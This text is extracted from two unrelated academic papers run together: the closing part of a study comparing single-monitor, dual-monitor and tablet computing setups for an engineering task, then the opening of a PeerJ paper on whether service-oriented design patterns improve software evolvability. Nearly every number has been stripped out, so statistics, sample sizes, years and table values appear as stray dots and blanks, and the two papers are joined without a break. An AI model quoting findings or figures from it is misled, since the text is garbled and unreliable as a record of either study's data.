within-subject experimental design. the single factor was ‘computing environment’, with three levels (a, b, c), depicted in figure . analysis of variance (anova) was planned to test for a main effect of ‘computing environment’ on each dependent outcome measures. we planned to use non-parametric statistical testing (i.e., friedman two-way anova) if the normality assumption of anova was violated for a dependent variable. a . level of significance was applied to all statistical tests. qualitative data collected from the debrief interview session were analyzed for recurrent themes across participants. these qualitative data were collected to help explain the quantitative results. . results . performance . . time. mean scenario completion time, with the standard deviation in parentheses, was . sec ( . sec) for condition a, . sec ( . sec) for condition b, and . sec ( . sec) for condition c. anova did not reveal a main effect of computing environment on time. . . accuracy. solutions were used to check the accuracy of each participants flow process charts in terms of errors made. errors included omission errors, incorrect classification of events (e.g., operation vs. transportation), and errors involving the time or distance (for transportation items) for each event. these error counts were treated as ordinal data; median errors were committed by participants when completing scenarios with condition a, median errors with condition b, and median errors with condition c. a friedman two-way anova revealed a main effect of computing environment on errors, x ( ) = . , p = . , unadjusted for ties. post-hoc analysis showed that the difference between conditions b and c was the only significant difference (wilcoxon signed ranks test). . workload the nasa tlx data were not normally distributed for the overall composite score or for any of the six subscales, with the exception of mental demand. therefore, we used non- parametric testing to analyze the workload data. the friedman two-way anova was used to analyze the overall score and subscales and found no statistically significant differences in workload across the three conditions. a summary of the nasa tlx scores is presented in table . ---------------------------------------------- insert table about here ---------------------------------------------- . usability the csuq is analyzed along an overall score and three subscales, shown in table . item related to error messages and was excluded from the analysis since there were no error messages presented to participants as part of the study scenario. a copy of the complete csuq survey is available in appendix e. we used anova to test for a main effect of computing environment on the system usefulness and information quality subscales. however, the data for overall satisfaction and interface quality failed the normality assumption and so we treated those data as ordinal and used the friedman two-way anova for those two subscales. statistically significant results were found for overall satisfaction, x ( ) = . , p = . , unadjusted for ties; system usefulness, f( , ) = . , p = . ; and interface quality, x ( ) = . , p = . , unadjusted for ties. for system usefulness, post-hoc analysis (tukey pairwise comparisons) revealed that the significant difference is isolated between conditions a and b. condition c is not considered different than a or b. for both overall satisfaction and interface quality, post-hoc analysis (wilcoxon signed rank test) revealed that b is significantly different from a and c. however, a and c are not considered different. ---------------------------------------------- insert table about here ---------------------------------------------- . qualitative results during the debrief interview, of participants expressed a clear preference for the computing environment in condition b (dual monitors and one ipad); participants expressed a clear preference for condition a (single monitor); no participants expressed a preference for condition c (single monitor and two ipads). of the participants who chose the layout in condition b as best, of them explicitly stated that the ipad was unnecessary. conversely, of the participants expressed a clear preference for the ipad in addition to the dual monitors. when asked what an “optimal” computing environment for their work (i.e., not restricted to choosing one of the three conditions), participants indicated they would prefer two desktop monitors. one participant would prefer a single desktop monitor. and one participant indicated, “the more monitors the better”. within these responses, five participants expressed a desire or noted an advantage for having a mobile device in addition to fixed monitors for portability of information (three mentioned tablet computers, one mentioned a smart phone, and one mentioned a laptop). . discussion the results of this investigation into the benefit of using multiple screens and multiple devices were mixed; some of our hypotheses were not supported and others were partially supported. our first hypothesis was that participants would perform the scenarios in significantly less time and with significantly fewer errors with conditions b and c as compared to condition a. while participants, on average, completed scenarios in less time with condition b, there was no statistically significant difference in time to complete scenarios for the three computing environments. one statistically significant result for errors was isolated between conditions b and c; participants committed significantly less errors when using condition b compared to c. these results suggest marginal support for our first hypothesis, but only for condition b. condition c was not considered different than the baseline condition a for time and errors. our second hypothesis was that participants would experience significantly less mental workload when completing the scenarios with conditions b and c as compared to condition a. this hypothesis was not supported. there was no statistically significant difference in the nasa tlx scores when completing scenarios for the three computing environments. however, it is worth noting that condition b was scored, on average, as better than the other conditions especially on the ‘mental demand’ and ‘effort’ subscales. the third hypothesis was that participants would rate the usability of the work area computing set-up in conditions b and c significantly higher as compared to condition a. this hypothesis was partially supported. condition b was scored significantly higher for overall usability and interface quality compared to both conditions a and c; as well as significantly higher for system usefulness compared to condition a. however, condition c was not scored significantly higher for any of the csuq scales compared to the baseline condition a. our final hypothesis was that there would be no significant differences for any of the dependent variables between condition b and condition c. this hypothesis was not supported. participants committed significantly fewer errors with condition b compared to condition c. they also rated the overall usability and interface quality as significantly better for the computing environment condition b compared to condition c. . key findings a dual monitor desktop with a single tablet computer (condition b) was the ideal computing environment for the “information-rich” engineering problem given to participants. this is supported by converging evidence from the dependent measures as well as the qualitative debrief interviews. a single desktop monitor with two tablet computers (condition c) did not provide any advantage compared to a single desktop monitor (condition a). overall, these findings provide only marginal support for the concept we set out to investigate, which was the notion that more screens and possibly more devices may help focus one’s attention rather than serve as a distraction, making multiple tasks viewable at a glance across multiple device screens (thompson, ). the finding of a performance and usability advantage of the dual monitors in condition b is consistent with previous studies (anderson et al., ; poder et al., ; russell & wong, ). a key difference in our study is that we provided a tablet computer in addition to the dual monitors. however, the debrief interviews were mixed as to the usefulness of the third screen provided by the tablet; some participants thought it was not helpful whereas other did find it useful. the complete lack of performance, workload, and usability differences between condition c (single monitor and two tablet computers) and condition a (single monitor) does not support the notion that a multiscreen environment can help focus one’s attention. indeed, some participants noted that using multiple screens provided by the tablet computer(s) was distracting. others noted that while they did not hinder their tasks, they did not help. . limitations and future research our study focused on engineering students completing flow process charts with a race car pit stop scenario as an example of an information-rich task, where the use of multiple screens was potentially useful. a more complex scenario or application area, with a clearer distinction for parsing certain information across screens with distinctly different purposes, may be more amenable to a multiscreen and multi-device environment. for example, a physician that needs to integrate patient data and other information from multiple functions within an ehr and other related clinical information systems may be a more beneficial example to investigate in a future study. also, our study used apple ipad tablets; all but one of our participants had experience using tablet computers but only one reported regularly using a ipad. future research should incorporate other types of tablets and mobile devices, as well as more advanced ones that may better approximate the forgotten power of paper (e.g., tarun et al, ). . conclusion we designed a study to investigate the potential benefit of multiscreen and multiple device environments using three different computing environment conditions. scenarios completed with condition b, which included a desktop with dual -inch monitors, as well as a single tablet computer with a . -inch display, resulted in significantly less errors compared condition c, which included a desktop with a with a -inch monitor, as well as two tablet computers, with . inch displays. condition b was also resulted in significantly higher usability ratings compared to condition c and compared to a baseline condition a (single desktop computer with a -inch monitor). our findings are consistent with the literature that show better performance using a dual screen set-up. however, our findings provide only marginal support for the benefit of incorporating additional screens in the form of tablet computers during information-rich, complex tasks. based on these results, we recommend a computing work environment with dual screen monitors, with an optional tablet computer, for complex and information-rich computing tasks. acknowledgements a portion of the results from this study was presented at the human factors and ergonomics society (hfes) international annual meeting, austin, tx, october – , . this work was supported by the department of industrial engineering, j.b. speed school of engineering, and the center for ergonomics, university of louisville. references anderson, a., colvin, j., tobler, n., & lindsay, d. ( ). productivity and multi-screen displays. rocky mountain communication review, , - . armyranger [screen name]. ( ). nascar pit stop at talledega . retrieved from https://www.youtube.com/watch?v=grhsondlsjq. byrd, k. s. & caldwell, b. s. ( ). increased memory load during task completion when procedures are presented on mobile screens. behaviour & information technology, , - . czerwinski, m., robertson, g., meyers, b., smith, g., robbins, d., & tan, d. ( ). large display research overview. proceedings of chi , - . de backere f., vanhove, t., dejonghe, e., feys, m., herinckx, t., vankelecom, j. et al. ( ). platform for efficient switching between multiple devices in the intensive care unit. methods inf.med., , - . grudin, j. ( ). partitioning digital worlds: focal and peripheral awareness in multiple monitor use. proc.chi , - . hart, s. & staveland, l. ( ). development of the nasa-tlx (task load index): results of empirical and theoretical research. in p.a.hancock & n. meshkati (eds.), human mental workload (pp. - ). north-holland: elsevier science publishers. hendy, k. c., hamilton, k. m., & landry, l. n. ( ). measuring subjective workload: when is one scale better than many? human factors, , - . http://www.youtube.com/watch?v=grhsondlsjq interstate batteries. ( ). inside a nascar pit stop with joe gibbs racing pit crew coach mike lepp. retrieved from https://www.youtube.com/watch?v=pdskh ge xm. jokela, t., ojala, j., & olsson, t. ( ). a diary study on combining multiple information devices in everyday activities and tasks. in proceedings of the rd annual acm conference on human factors in computing systems (pp. - ). acm. lewis, j. r. ( ). ibm computer usability satisfaction questionnaires: psychometric evaluation and instructions for use. international journal of human-computer interaction, , - . nygren, t. e. ( ). psychometric properties of subjective workload measurement techniques: implications for their use in the assessment of perceived mental workload. human factors, , - . poder, t. g., godbout, s. t., & bellemare, c. ( ). dual vs. single computer monitor in a canadian hospital archiving department: a study of efficiency and satisfaction. health information management journal, , - . rashid, u., nacenta, m. a., & quigley, a. ( ). factors influencing visual attention switch in multi-display user interfaces: a survey. proceedings of the international symposium on pervasive displays, . russell, s. e. & wong, k. ( ). dual-screen monitors: a qualitative analysis of their use in an academic library. the journal of academic librarianship, , - . saleem, j. j., russ, a. l., justice, c. f., hagg, h., ebright, p. r., woodbridge, p. a. et al. ( ). exploring the persistence of paper with the electronic health record. int.j.med.inform., , - . http://www.youtube.com/watch?v=pdskh ge xm shin, g. & hegde, s. ( ). user-preferred position of computer displays: effects of display size. hum.factors, , - . simmons, t. ( ). what's the optimum computer display size? ergonomics in design, , - . simmons, t. & manahan, m. ( ). the effects of monitor size on user performance and preference. proceedings of the human factors and ergonomics society rd annual meeting, . tan, d. s. & czerwinski, m. ( ). effects of visual separation and physical continuities when distributing information across multiple displays. proc.interact , - . tarun, a., wang, p., girouard, a., strohmeier, p., reilly, d., & vertegaal, r. ( ). papertab: an electronic paper computer with multiple large flexible electrophoretic displays. in extended abstracts of acm chi’ conference on human factors in computing. acm press, pp. - . thompson, c. ( , july ). how working on multiple screens can actually help you focus. wired. retrieved from http://www.wired.com/ / /multi-screen-life/ figure three experimental conditions for computing environment. condition a had a single desktop computer with a -inch monitor (baseline condition). condition b had a desktop with dual -inch monitors, as well as a single tablet computer with a . -inch display. condition c had a desktop with a -inch monitor, as well as two tablet computers, with . inch displays. table (on next page) information partition across screens and devices participants were asked to use flow process charts to document the steps that members of a race car team perform during a pit stop for each of the three experimental conditions for computing environment. the table shows how the information needed to complete the scenario was partitioned across the screens and devices for each condition. table information partition across screens and devices screen/device condition a condition b condition c monitor tutorial video flow process chart tutorial video pit stop video flow process chart flow process chart email access email access dimension sheet monitor n/a tutorial video n/a email access dimension sheet ipad n/a pit stop video pit stop video ipad n/a n/a dimension sheet table (on next page) summary of nasa tlx scores (mean, standard deviation) the table shows workload ratings for each of the six subscales and overall composite score for the nasa tlx. cond., condition; md, mental demand; pd, physical demand; td, temporal demand; perf., performance; frust., frustration; total, total composite tlx score, unweighted. table summary of nasa tlx scores (mean, standard deviation) cond md pd td perf. effort frust. total a . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) b . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) c . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) note. cond., condition; md, mental demand; pd, physical demand; td, temporal demand; perf., performance; frust., frustration; total, total composite tlx score, unweighted. table (on next page) usability scores fromthe computer system usability questionnaire (csuq) the table shows the usability ratings from the csuq. item was excluded from the analysis as not applicable. ratings are derived from -point likert-type scales ranging from = strongly disagree to = strongly agree. * p values indicate statistically significant findings ( p < . ). p values reported for system usefulness and information quality are from analysis of variance (anova). p values reported for overall satisfaction and interface quality are from the friedman two-way anova, unadjusted for ties. table usability scores from the computer system usability questionnaire (csuq) score condition a condition b condition c p value overall satisfaction (items - ) . ( . ) . ( . ) . ( . ) . * system usefulness (items - ) . ( . ) . ( . ) . ( . ) . * information quality (items - ) . ( . ) . ( . ) . ( . ) . interface quality (items - ) . ( . ) . ( . ) . ( . ) . * note. item was excluded from the analysis as not applicable. ratings are derived from -point likert-type scales ranging from = strongly disagree to = strongly agree. *p values indicate statistically significant findings (p< . ). p values reported for system usefulness and information quality are from analysis of variance (anova). p values reported for overall satisfaction and interface quality are from the friedman two-way anova, unadjusted for ties. on the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis on the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis justus bogner , , stefan wagner and alfred zimmermann herman hollerith center, university of applied sciences reutlingen, boeblingen, baden-wuerttemberg, germany institute of software technology/software engineering group, university of stuttgart, stuttgart, baden-wuerttemberg, germany abstract background: design patterns are supposed to improve various quality attributes of software systems. however, there is controversial quantitative evidence of this impact. especially for younger paradigms such as service- and microservice-based systems, there is a lack of empirical studies. objective: in this study, we focused on the effect of four service-based patterns—namely process abstraction, service façade, decomposed capability, and event-driven messaging—on the evolvability of a system from the viewpoint of inexperienced developers. method: we conducted a controlled experiment with bachelor students (n = ). two functionally equivalent versions of a service-based web shop—one with patterns (treatment group), one without (control group)—had to be changed and extended in three tasks. we measured evolvability by the effectiveness and efficiency of the participants in these tasks. additionally, we compared both system versions with nine structural maintainability metrics for size, granularity, complexity, cohesion, and coupling. results: both experiment groups were able to complete a similar number of tasks within the allowed min. median effectiveness was / . mean efficiency was % higher in the treatment group, but this difference was not statistically significant. only for the third task, we found statistical support for accepting the alternative hypothesis that the pattern version led to higher efficiency. in the metric analysis, the pattern version had worse measurements for size and granularity while simultaneously having slightly better values for coupling metrics. complexity and cohesion were not impacted. interpretation: for the experiment, our analysis suggests that the difference in efficiency is stronger with more experienced participants and increased from task to task. with respect to the metrics, the patterns introduce additional volume in the system, but also seem to decrease coupling in some areas. conclusions: overall, there was no clear evidence for a decisive positive effect of using service-based patterns, neither for the student experiment nor for the metric analysis. this effect might only be visible in an experiment setting with higher initial effort to understand the system or with more experienced developers. subjects world wide web and web science, software engineering keywords design patterns, evolvability, modifiability, controlled experiment, metrics, service-oriented architecture, service-based systems, microservices how to cite this article bogner j, wagner s, zimmermann a. . on the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis. peerj comput. sci. :e doi . /peerj-cs. submitted may accepted july published august corresponding author justus bogner, justus.bogner@iste. uni-stuttgart.de academic editor philipp leitner additional information and declarations can be found on page doi . /peerj-cs. copyright bogner et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:justus.�bogner@�iste.�uni-stuttgart.�de mailto:justus.�bogner@�iste.�uni-stuttgart.�de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ introduction one important concern for enterprise software in today’s digital and fast-moving world is the ability to quickly adapt to new or changing functional or cross-functional requirements. this concern is addressed by the software quality attribute evolvability (sometimes also referred to as modifiability or changeability): the degree of effectiveness and efficiency with which a software system can be modified to adapt or extend it (rowe, leaney & lowe, ; international organization for standardization, ). several benefits related to this quality attribute were achieved with the rise of service- oriented computing (soc) (papazoglou, ), such as loose coupling, isolation of the service implementation behind business-relevant interfaces, or convenient reuse and composition. while service-oriented architecture (soa) (erl, ) is still an important architectural style, microservices (newman, ; fowler, ) gain more and more popularity as a flexible, lightweight, and decentralized service-oriented variant. one frequently used instrument to enhance modifiability is the application of design patterns. employing these established solution blueprints for recurring problems is especially common with object-oriented systems. there is, however, also a significant amount of patterns specifically designed for service-based and even microservice-based systems (erl, ; rotem-gal-oz, ; richardson, ). one issue with design patterns is that their relationship with quality attributes (qas) is often complex and governed by trade-offs. moreover, while the benefits of patterns for qas like modifiability seem plausible in theoretical and qualitative studies (bogner, wagner & zimmermann, ), quantitative empirical evidence for their effectiveness is of a more controversial nature. in scientific literature, we find studies that do report a positive impact on qas, studies that do not, and studies that do so under certain conditions or only for selected patterns (garzás, garcía & piattini, ; hegedūs et al., ; ali & elish, ). awareness of and familiarity with the concrete patterns is often discussed as a prerequisite for their effectiveness. since most of these studies are concerned with object-oriented or architectural patterns and there is very little empirical research on service-oriented patterns and modifiability, we conducted a controlled experiment to partially address this gap. a total of students in two groups changed and extended two functionally equivalent versions of a service-based web shop system (one pattern version, one non-pattern version) while the time was measured for each task. independent of this experiment, we also collected structural maintainability metrics (e.g. size, coupling, cohesion) for both system versions to have a foundation for a second comparison. the research objective for this study can therefore be summarized in the following way: analyze selected service-oriented patterns for the purpose of improving modifiability with respect to effectiveness, efficiency, and structural metrics from the viewpoint of inexperienced software developers (students) in the context of a service-based web shop system bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we follow the basic structure of the reporting guidelines for experiments in software engineering as proposed by jedlitschka, ciolkowski & pfahl ( ). the remainder of the paper first presents the technical background (“background”) by elaborating the concept of (service-oriented) design patterns and discussing related work in the area. after that, we describe the experiment design (“experiment design”) and present the experiment results (“experiment results”) followed by the metric results (“metric analysis”). in the sections thereafter, we provide possible interpretations (“discussion”) and discuss limitations (“threats to validity”). lastly, we compile the most important lessons learned (“lessons learned from the experiment”) and conclude with a summary as well as potential future work (“conclusion”). background to understand the motivation behind this study, two topics need to be explained in greater detail: namely patterns as an instrument of software design as well as their relation to qas, for which we present related work in the area. design patterns the idea of design patterns originated from the construction and city building language of alexander, ishikawa & silverstein ( ), who conceptualized a network of solution blueprints. the concept was adapted to several other domains including computer science and is very popular in software engineering and software architecture. as such, a pattern is a proven and established solution to a recurring design problem that is documented in a technology-agnostic form and can be implemented in many similar yet not completely identical ways. the documentation is often systematic and standardized within a pattern language and includes for example attributes like context, problem, forces, solution, or related patterns. while the most famous examples are the object-oriented “gang of four” design patterns of gamma et al. ( ), there are meanwhile patterns for software architecture (buschmann et al., ), enterprise applications (fowler, ), message- based integration (hohpe & woolf, ), or cloud computing (fehling et al., ). there is also a significant body of patterns in the field of soc. most of these have been conceptualized for the context of soa. prominent examples are the patterns by erl ( ), erl et al. ( ), rotem-gal-oz ( ), or daigneau ( ). they are usually on an architectural level and are for example, concerned with service inventories, communication, and composition, but can also be focused on the design of an individual service. even though a significant number of soa patterns seems to be also applicable to microservices (bogner, zimmermann & wagner, ), the first pattern languages for the younger service-based architectural style are emerging (richardson, ). furthermore, several of these microservices patterns have existing ancestor patterns from soa or other contexts. related work one primary driver for the use of patterns is their impact on qas like availability, performance, or modifiability. several studies have been conducted to analyze this complex and controversial relationship. bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the context of object-oriented design, garzás, garcía & piattini ( ) conducted a controlled experiment with students who had to analyze and modify four uml class diagrams. one group worked on a standard and straightforward design model while the other had a semantically equivalent version that contained design rules (e.g., “dependencies between classes must be implemented with abstractions.”) and patterns (e.g. state or composite). understandability (via questions) and modifiability (via extension tasks) were measured. results showed that the latter version with rules and patterns was more difficult to understand ( % less time and % more correct answers for the non-pattern version). for modifiability, no statistically significant difference in efficiency could be identified. hegedūs et al. ( ) used a probabilistic quality model based on iso/iec to analyze the maintainability of more than revisions of the java gui framework jhotdraw, which employs well-known object-oriented patterns. every usage of design patterns in jhotdraw is documented with javadoc and there are a lot of revisions that only introduce patterns. the authors conclude from the analysis that the introduction of additional patterns increased the overall maintainability in the system. they measured a strong correlation (r-value: . ) between pattern-line-density and maintainability. a broader view on the impact of the “gang of four” design patterns on software quality is given by ali & elish ( ). their comparative literature analysis of empirical studies revealed that only four qas and only a small subset of the patterns have been examined. moreover, no general consensus concerning the impact could be reached (positive, neutral, or negative). interestingly, for maintainability, evolution, and change-proneness, the overall tendencies concerning the impact of the analyzed patterns were negative. in the domain of architectural patterns, kassab, el-boussaidi & mili ( ) analyzed the impact of the patterns pipes and filters, layers, model view controller, and broker on the two qas performance and security. they determined the quantitative effect of patterns on qas via the proxy of architectural tactics. from these results, they concluded for example, that model view controller is best suited for performance while being least suited for security and that the layers pattern is most accommodating for security. riaz, breaux & williams ( ) conducted a systematic mapping study with the goal to characterize the research design of empirical studies with human subjects about the application of software patterns. maintenance was the most frequent context with of studies. nearly half of the studies were concerned with object-oriented design patterns ( ). efficiency and correctness were the most common measures for evaluating the pattern application. the authors also report that differences in experiment design make it difficult to compare the results and that several studies fail to mention limitations as well as how they minimized the threat of biases. in the context of service orientation, galster & avgeriou ( ) performed a theoretical qualitative mapping of ∼ service-based design patterns to the qas of the s-cube quality reference model via force resolution maps (impact from - to + ). they reported that qas from the very detailed s-cube model were not addressed by the patterns. most mapped qas were performance and scalability. since s-cube does not include some bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ important qas, they also used iso/iec . for maintainability, they identified a total of patterns. lastly, palma et al. ( ) analyzed the impact of service-based patterns and anti-patterns on maintenance and evolution by collecting historical software development meta data (# of changes and code churn) for the frascati system. they observed that services involved in patterns required less maintenance effort. however, this effect was not statistically significant. services with anti-patterns on the other hand were found to need significantly more maintenance effort, especially for instances of god component or service chain. the presented related work gives an overview of the complex relationship between patterns and qas and the controversial evidence. not many empirical quantitative studies exist for service-based patterns in general and their modifiability in particular, which is why we aim to bring additional quantitative insights into this relationship with the results of the first controlled experiment as well as a metric-based analysis. experiment design the research goal for our experiment was to analyze if selected service-based patterns have a significant impact on the evolvability of a system in terms of the completion of modifications within a given time (effectiveness) and the time needed per modification (efficiency). the experiment object was a simple service-based web shop system that has been specifically constructed for this experiment . it consists of several restful java services for example, customers, orders, products, and notifications and a web based frontend. data persistence and unnecessary create read update delete (crud) operations have not been fully implemented. as such, the system is reasonably close to a real world web shop, but is still of manageable complexity for an experiment. the online shop domain was chosen because most people are somewhat familiar with it from personal experience. moreover, it is very common to implement such systems in a service-oriented way. we created two functionally equivalent versions of this web shop. one version was built in an “ordinary” way (see figs. and ) while the other version was designed with several service-based patterns that are believed to be beneficial for modifiability, for example, process abstraction and service façade (see figs. and ). table lists the selected patterns together with their source, intended effect, and relevant task number. in general, the pattern version of the system exhibits a higher base complexity (e.g., more services, special patterns), but has been intentionally prepared for the nature of the task modifications through the used patterns. we chose these patterns because their theoretical benefit for evolvability is well documented. while professional software developers who are familiar with service-based systems and patterns could be fitting experiment subjects, we instead opted for more inexperienced developers, that is, students. first, it is very difficult to convince a large number of software professionals to spend two hours of their valuable time for free on seemingly meaningless coding. and second, if the patterns’ advantages materialize even with inexperienced developers that have little or no conscious knowledge of them, their effect on evolvability must be substantial. however, while it is common to use students in software engineering see https://github.com/xjreb/research- modifiability-pattern-experiment for source code, task descriptions, survey questions, data set, and analysis results. zenodo mirror for non-source code artifacts: doi . /zenodo. . bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/xjreb/research-modifiability-pattern-experiment https://github.com/xjreb/research-modifiability-pattern-experiment https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ordersrvwebui productsrv customersrv notificationsrv invokes figure version # pre-experiment: initial architecture of non-pattern version. full-size doi: . /peerj-cs. /fig- ordersrvwebui warehousesrv customersrv notificationsrv invokes categorysrv productsrv figure version # post-experiment: final architecture of non-pattern version. full-size doi: . /peerj-cs. /fig- orderprocesssrv (process abstraction)webui productsrvfacade (service facade) customersrv notificationsrv invokes ordersrv productsrv (decomposed capability) kafka broker publishes figure version # pre-experiment: initial architecture of pattern version. full-size doi: . /peerj-cs. /fig- bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experiments, one must be more careful when generalizing the results to the population of all developers. on the plus side, students are often fairly homogeneous participants. finally, several studies have shown that using students instead of software professionals may affect the results only marginally in a lot of cases (host, regnell & wohlin, ; salman, misirli & juristo, ; falessi et al., ). our experiment subjects therefore were bachelor students (n = ) that needed to participate in an experiment as part of the “introduction to software engineering” lecture (mostly nd and rd semesters). students could choose one of two experiments based on a short description. data collection was anonymous and experiment performance had no influence on the students’ grades. participating in the experiment without data collection was also possible to pass the course. during experiment execution, students assigned table list of applied patterns in system version # . pattern name source intended effect task process abstraction erl ( ) details of the order process are abstracted in composition controller; changes can be made in central location (orderprocesssrv) # service façade erl ( ) shields the productsrv against all consumers; changes to the interface only have to be addressed at the façade # decomposed capability erl ( ) large and incohesive productsrv is prepared for future decomposition by internally isolating domain concepts # event-driven messaging/ inversion of communications erl ( ) and rotem-gal-oz ( ) productsrv publishes events instead of directly calling other services; decoupling of producers and consumers # orderprocesssrv (process abstraction) webui productsrvfacade (service facade) customersrv notificationsrv ordersrv productsrv warehousesrvcategorysrv kafka broker invokes publishes subscribes figure version # post-experiment: final architecture of pattern version. full-size doi: . /peerj-cs. /fig- bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ themselves randomly and unknowingly to one of the two groups by choosing a seat in the pc pool room: either the non-pattern version # , that is, the control group, or the pattern version # , that is, the treatment group. as experiment materials, students were provided with a fully configured virtual machine in the university pc pool room. they had documentation and task descriptions in both digital and printed form. they were allowed to use internet search in case of issues. a web interface with automatic tests for validating the completion of each of the three tasks was provided as well. students were advised to measure their own time per task with a stopwatch of their choosing. participants had to solve a total of three tasks that depended on each other (see table ). in the first task, the ordering process of the web shop system should be adjusted (e.g., customer credit rating check) and extended with an additional process step (sending of an email via the notificationsrv). version # had been prepared with the process abstraction pattern so that all changes had to be implemented in the orderprocesssrv as opposed to in three different services like in version # . in the second task, the large productsrv had to be decomposed into three smaller services: a productsrv to manage only product domain entities, a categorysrv to manage product categories, and a warehousesrv for product availability. version # incorporated the decomposed capability pattern to ease the decomposition as well as the service façade pattern that shielded the former productsrv from consumers. in the final task, a new process in response to adding a new product to the database should be implemented (sending out email and adding the new product to a marketing database). version # provided message-based communication via an apache kafka broker that allowed publishing a newproductevent, which implements the patterns event-driven messaging and inversion of communications. please refer to the folders workspace-version /_exercises or workspace-version /_exercises in our github repository (https://github.com/xjreb/research-modifiability-pattern-experiment) for the complete task descriptions. as response variables for our experiment, we analyzed effectiveness and efficiency (duration per task). effectiveness of a participant was measured as the percentage of the three tasks he/she successfully completed within the min, that is, %, %, %, or %. efficiency was recorded in seconds or as not available if the task was not completed. median effectiveness per group was only calculated and tested for the total of all three tasks. for mean efficiency, we additionally also analyzed and compared every individual task to derive the effect per pattern. while these two response variables also depend on the skill of the participants, they can characterize the systems’ evolvability if the two groups table list of experiment tasks. task task description # adjust the web shop ordering process (customer credit rating check, minimum available number of products) and extend it with an additional process step (sending of an email via the notificationsrv). # decompose the large productsrv into three smaller services: a productsrv to manage only product domain entities, a categorysrv to manage product categories, and a warehousesrv for product availability. # implement a new process triggered in response to adding a new product to the database. the new process sends out emails and adds the new product to a marketing database. bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/xjreb/research-modifiability-pattern-experiment http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ are large enough and roughly equal in skill. the predictor variable was the group or system version (i.e., control or treatment group). it was either # for the non-pattern version or # for the pattern version. to formalize our research objective, we constructed five experiment hypotheses h ij and their respective null hypotheses h ij, where i denotes the research goal identifier and j the counter if there is more than one hypothesis per goal (see table ). for effectiveness (i = ), we have one hypothesis (j = ) while for efficiency (i = ), we have four ( � j � , j ∈ ℕ), namely one per individual task and one for the complete set of tasks at once. since we have five hypotheses, this also means that we need bonferroni correction for the significance level of our hypothesis tests to account for the increased probability of type i errors. the necessary significance level a therefore is calculated by dividing the desired significance level by the number of hypotheses, that is, a = . / = . . the experiment execution took place in the following way. to prepare participants for the experiment, an introductory presentation was given on a separate day ( min). a total of of the students attended (∼ %). in this session, the structure and procedure of the experiment were explained. we also described the data collection and analysis process. furthermore, an introduction to the basic concepts of soc and restful http services was given to ensure a common base level of knowledge. lastly, the details of the experiment workspace were presented, e.g. ubuntu vm, eclipse integrated development environment (ide), directory structure, build scripts, task validation. the actual experiment took place over the course of the week following the introductory presentation in slots of – students. in such a slot (∼ h), there was first a short table pairs of experiment hypotheses (each in the form of an alternative hypothesis h ij and its null hypotheses h ij, where i represents the research goal identifier and j the counter for more than one hypothesis per goal; effectiveness: i = , efficiency: i = ); evx denotes the effectiveness for version x; dvx denotes the task durations for version x; dvx,ty denotes the task durations for version x and task y. alternative hypothesis null hypothesis effectiveness h : more tasks for the pattern version # of the system can be completed within the given time than for the non-pattern version # : median(ev ) > median(ev ) h : there is no difference in how many tasks can be completed for both versions of the system: median(ev ) ≈ median(ev ) efficiency (task duration) h : it takes less time to complete task# for the pattern version # of the system than for the non-pattern version # : mean(dv ,t ) < mean(dv ,t ) h : there is no difference in the time it takes to complete task# for both versions of the system: mean(dv ,t ) ≈ mean(dv ,t ) h : it takes less time to complete task# for the pattern version # of the system than for the non-pattern version # : mean(dv ,t ) < mean(dv ,t ) h : there is no difference in the time it takes to complete task# for both versions of the system: mean(dv ,t ) ≈ mean(dv ,t ) h : it takes less time to complete task# for the pattern version # of the system than for the non-pattern version # : mean(dv ,t ) < mean(dv ,t ) h : there is no difference in the time it takes to complete task# for both versions of the system: mean(dv ,t ) ≈ mean(dv ,t ) h : it takes less time to complete a task for the pattern version # of the system than for the non-pattern version # : mean(dv ) < mean(dv ) h : there is no difference in the time it takes to complete a task for both versions of the system: mean(dv ) ≈ mean(dv ) bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ introduction ( min) explaining the procedure and agenda. details of what would be measured and what data would be collected via the post-experiment survey were presented. we pointed out that experiment performance had absolutely no influence on the grade. data collection would be anonymous and participant ids could not be linked to student ids. following these explanations, we asked if there were any questions regarding this process and if it was acceptable for everybody (verbal consent). we also specifically pointed out the option to participate in the experiment without data collection. after that, there was a familiarization period ( min) during which students should get comfortable with the workspace and the system by reading documentation and playing around with the ide and the build scripts. this period was followed by the actual task execution with time measurement. participants had min to complete all three tasks. a web-based evaluation application with automated tests was provided to check for successful task completion. participants recorded their own time with a stopwatch and paused upon successful validation of a task via the evaluation ui. an experiment administrator was then notified to verify the completion and to document the duration. the timer was then reset and the next task began. after solving all three tasks or after min, participants finally filled out a short web-based survey with questions about the perceived difficulty per task, personal information (e.g. course of study and semester), and their self-reported experience with for example java, service-based systems, and patterns. their participant id and system version was also recorded to relate it to the task 